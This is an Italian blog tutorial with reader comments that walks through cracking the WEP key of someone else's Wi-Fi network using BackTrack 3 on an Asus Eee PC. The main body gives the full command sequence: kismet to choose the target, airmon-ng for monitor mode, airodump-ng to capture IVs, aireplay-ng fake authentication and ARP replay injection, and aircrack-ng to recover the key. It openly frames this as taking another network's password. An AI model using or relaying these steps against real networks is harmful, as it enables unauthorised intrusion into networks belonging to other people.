Craccare reti WEP TESTATO 100% Funzionante!!

Con Questa guida intendo spiegare nel lato pratico come è possibile crackare una chiave wepper mezzo di BackTrack 3 e di un asus Eeepc.(la guida è stata testata su un asus eee701)

PASSO 1)

Per prima cosa dobbiamo  inserire 
il programma che ci consentire di fare il tutto in una penna usb (poi capirete il perchè), e per fare ciò occorre
scricare QUESTO programma. (NB:il passo 1 va fatto solo la prima volta, tranne che formattate la penna usb, in quel caso dovete rifarlo)

Una volta scaricato:
  1. inserite la vostra pennetta usb da almeno 1 GB nel pc.
  2. Formattatela.
  3. Avviate il programma appena scaricato (unebootin)




Adesso:
            ATTENZIONE: per i punti 1-2-3-4 che seguono qua giù è necessario che siate collagati ad internet
  1. cliccate su "select distribution" e selezione come nell'immagine "backtrack".
  2. su "tipo" seleziona periferica usb.
  3. su "disco" scegliete la lettera che corrisponde alla vostra penna usb(nel mio caso è G:\ ma nel vostro potrebbe essere qualsiasi altra lettera,basta quardare su risorse del computer!!).
  4. cliccate ok
  5. Attendete il che il programma finisca il tutto (potrebbe impiegare anche qualche ora,dipende dalla velocità della vostra connessione ad internet).
  6. Fatto ciò scollagate il pennino.
  7. Spegnete il pc (vi conviene stampare la guida o seguirla su un altro pc senno non si può andare avanti).                        Fine PASSO 1).
    
  Adesso comincia la procedure piu complicata.Fate attenzione.

Una volta spento il pc procediamo con mettere la chiavetta dentro l'eeepc spento(scusate la ripetizione!), accendiamolo e quando compare la schermata iniziale (circa 1-2 secondi dopo l'accensione) cliccate ripetutamente il tasto ESC fino a quando non vi compare la lista delle unità avviabili (dovrebbe essere simile a questa la schermata)(se si dovesse avviare il windows normalmente spegnete e rirpovate; se il tasto esc non fa partire il progrmma provate canc oppure f12 oppure f3 dipende dal pc).



quindi sceglierete la vostra chiave usb spostandovi con i pulsanti SU e GiU'.(praticamente dovete selezionare la riga dove sta scritto usb,se ve ne stanno scritte piu di una selezionate la prima e se non funziona provate la seconda ).


Fatto cio si avvierà il programma, attendete...


Ora vi chiederà che interfaccia grafica utilizzare scegliete la prima della lista ovvero KDE
(per comodità) poi inizierà a caricare il sistema operativo e subito dopo vi chiederà la
risoluzione e voi clickerete il tasto SPACE.
Ok attendete un paio di minuti che si avvii la distro.
Ottimo ora siamo pronti per procedere a cercare e crackare reti wireless con chiave wep.
Apriamo il terminale e digitiamo:  kismet -c madwifi_g,wifi0,wifi0      (Fig.2):







Adesso dovrebbero comparire le varie reti:
  1. Schiaccia il tasto " S " dalla tastiera (si aprirà cosi un menù).
  2. Digita adesso " W ".
  3. Adesso spostati con le frecce sulla rete alla quale vuoi fregare la password
  IMPORTANTE: NON TUTTE LE RETI SONO CRECKABILI, QUELLO CHE POSSONE ESSERE CRACKATE SONO CONTRADDISTINTE DA UNA " Y " SOTTO IL CAMPO "W" (quello scritto in bianco in alto tra "T" e"ch")
Consiglio: selezionate la rete che ha il valore "size" più alto
  
Adesso hai tutti i dati che ti servono per sferrare l'attacco


Apri un nuovo terminale digita:
  1. Digita "iwconfig"
  2. Poi digita "airmon-ng stop kis0"
  3. Poi digita " airmon-ng stop ath0 "
  4. Adesso riapri nuovamente un terminale e digita: "airmon-ng start wifi0 6"  (6 lo sostituisci con il canale dell'access point che lo trovi nella
finestra di kismet quella già aperta dove ci sono i dati della rete, dove sta scritto kismet network details)


Adesso partiamo all'attacco apri un nuovo terminale :

  1. Digita" airodump-ng --ivs -w /root/capture --channel(scrivi il canale dell'access point) ath0 "
  2. Apri un nuovo terminale e digita : "aireplay-ng -1 0 -e (ssid il nome della rete) -a (bssid il mac dell'access point) -h 00:11:22:33:44:55 ath0 "  (quei numeri 00:11:22...ect devi sostituirli con quelli del tuo indirizzo mac)
  3. Apri un  nuovo terminale :"aireplay-ng -3 -b (bssid il mac dell'access point) -h 00:11:22:33:44:55 ath0"
  4. Ora raccogli almeno 10000 pacchetti data ovvero quelli sotto la colonna "Data" come nell'immagine:




Non appena "Data arriva a 10000 (o di piu!)":
  1. Apriamo un altro terminale e digitiamo: "aircrack-ng -s /root/capture-01.ivs"
Devi selezionare la rete e dopo parte il cracking,devi solo attendere che lui attraverso i
pacchetti data che sono i pacchetti ivs provi varie combinazioni fino a trovare la chiave.
In genere calcola che se la chiave è una 64-bit bastano 20000 se è 128-bit ne servono
intorno ai 40000

12 commenti:

  1. caspita! FUNZIONA!

    RispondiElimina
  2. a me invece quando dovrebbe partire il download di backtrack mi dice che verrà avviata in live e quindi senza installazione...
    durante il boot nn funziona niente!!!

    qualcuno mi saprebbe dire il motivo?

    RispondiElimina
  3. ciao è possibile con un windows o deve essere perforza un mac ??

    RispondiElimina
  4. Perché quando clicco la pen drive mi compare la scritta press tab e poi fa una specie di conto alla rovescia vi prego aiutatemi grazie in anticipo

    RispondiElimina
  5. Devi far riconoscere la pen drive al computer come Hard Disc. Se riesco creerò un tutorial a breve.

    RispondiElimina
  6. e come si fa a fare riconescereil pen drive come hard disk?

    RispondiElimina
  7. Sarà oggetto del nostro nuovo Post!

    RispondiElimina
  8. ragazzi ma per trovare una woa serve un dizionario?

    RispondiElimina
  9. mondoinformatico20 agosto 2011 15:40

    Si, serve

    RispondiElimina
  10. Domanda:
    Questo procedimento funziona anche se eseguito da un pc Windows? (Nel mio caso 7) Perché a leggere i comandi da impartire attraverso il terminale mi sembra che quest'ultimi siano caratteristici di Linux (magari èsolo un impressione mia)
    PS: questa guida funziona indipendentemente dal gestore del router che voglio craccare e dal tipo di password (se è stata cambiata oppure è allo stato di fabbrica)
    Grazie per l'attenzione.

    RispondiElimina

Disqus for Mondo Informatico